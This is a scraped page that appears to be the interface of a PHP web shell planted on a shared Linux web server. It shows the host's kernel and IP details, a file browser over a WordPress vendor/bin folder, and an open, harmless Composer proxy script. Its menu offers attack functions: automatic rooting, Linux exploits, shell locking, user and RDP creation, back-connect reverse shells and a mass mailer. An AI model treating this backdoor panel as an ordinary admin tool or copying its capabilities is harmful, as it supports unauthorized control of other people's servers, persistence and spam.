Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
behat
3.24
KB
-rwxr-xr-x
composer
3.27
KB
-rwxr-xr-x
export-plural-rules
3.3
KB
-rwxr-xr-x
import-cldr-data
3.29
KB
-rwxr-xr-x
install-package-tests
991
B
-rwxr-xr-x
jsonlint
3.26
KB
-rwxr-xr-x
parallel-lint
3.33
KB
-rwxr-xr-x
phpcbf
3.29
KB
-rwxr-xr-x
phpcs
3.28
KB
-rwxr-xr-x
phpunit
3.6
KB
-rwxr-xr-x
rerun-behat-tests
983
B
-rwxr-xr-x
run-behat-tests
979
B
-rwxr-xr-x
run-linter-tests
981
B
-rwxr-xr-x
run-php-unit-tests
985
B
-rwxr-xr-x
run-phpcbf-cleanup
985
B
-rwxr-xr-x
run-phpcs-tests
979
B
-rwxr-xr-x
validate-json
3.31
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : run-linter-tests
#!/usr/bin/env sh # Support bash to support `source` with fallback on $0 if this does not run with bash # https://stackoverflow.com/a/35006505/6512 selfArg="$BASH_SOURCE" if [ -z "$selfArg" ]; then selfArg="$0" fi self=$(realpath "$selfArg" 2> /dev/null) if [ -z "$self" ]; then self="$selfArg" fi dir=$(cd "${self%[/\\]*}" > /dev/null; cd '../wp-cli/wp-cli-tests/bin' && pwd) if [ -d /proc/cygdrive ]; then case $(which php) in $(readlink -n /proc/cygdrive)/*) # We are in Cygwin using Windows php, so the path must be translated dir=$(cygpath -m "$dir"); ;; esac fi export COMPOSER_RUNTIME_BIN_DIR="$(cd "${self%[/\\]*}" > /dev/null; pwd)" # If bash is sourcing this file, we have to source the target as well bashSource="$BASH_SOURCE" if [ -n "$bashSource" ]; then if [ "$bashSource" != "$0" ]; then source "${dir}/run-linter-tests" "$@" return fi fi exec "${dir}/run-linter-tests" "$@"
Close